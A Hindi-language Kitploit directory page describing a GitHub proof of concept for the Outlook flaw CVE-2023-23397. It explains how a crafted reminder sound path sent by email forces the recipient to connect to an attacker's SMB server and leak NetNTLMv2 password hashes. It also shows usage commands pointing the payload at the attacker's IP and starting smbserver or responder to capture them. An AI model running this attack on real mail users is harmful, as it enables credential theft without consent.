Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-23397 — CVE-2023-23397 भेद्यता का सरल PoC, जिसका payload ईमेल द्वारा भेजा जाता है। | Kitploit
उपकरण/GitHubGitHub/trackflaw/cve-2023-23397
फ़िशिंग उपकरणपासवर्ड हमलेपेलोड जनरेशनभेद्यता विश्लेषणशोषणईमेल सुरक्षा
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

CVE-2023-23397 भेद्यता का सरल PoC, जिसका payload ईमेल द्वारा भेजा जाता है।

रिपॉजिटरी देखें
132283 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2023-23397

Outlook थिक क्लाइंट को प्रभावित करने वाली CVE-2023-23397 भेद्यता का सरल और जल्दबाज़ी में बनाया गया PoC।

विवरण

Outlook में उपयोगकर्ता इनपुट पर नियंत्रण की कमी है, जो मीटिंग और अपॉइंटमेंट रिमाइंडर की ध्वनि को कॉन्फ़िगर करने की अनुमति देता है। वास्तव में, एक हमलावर उपयोगकर्ता की ओर से किसी भी हेरफेर के बिना (ज़ीरो क्लिक भेद्यता) पीड़ित को अपने सर्वर से कनेक्शन बनाने के लिए मजबूर कर सकता है।

इस भेद्यता का शोषण करने वाला हमलावर SMB अनुरोध के माध्यम से फंसे हुए उपयोगकर्ता के पासवर्ड पर आधारित NetNTLMv2 डाइजेस्ट प्राप्त करता है। मेल इनबॉक्स में आते ही अनुरोध ट्रिगर हो जाता है।

PoC क्या करता है?

  1. .msg पेलोड उत्पन्न करता है।
  2. इसे कस्टम SMTP सर्वर के साथ ईमेल द्वारा भेजता है।

उपयोग

एक सत्र में :

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

दूसरे सत्र में (smbserver या responder जैसा आप चाहें)।

root@kitploit:~
smbserver.py -smb2support SHARE .

डेमो (मैनुअल PoC)

poc

व्याख्यात्मक वीडियो (फ्रेंच भाषा में)

Microsoft Outlook के साथ पासवर्ड प्राप्त करें #CVE-2023-23397

मूल लेख

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

टूल डाउनलोड करें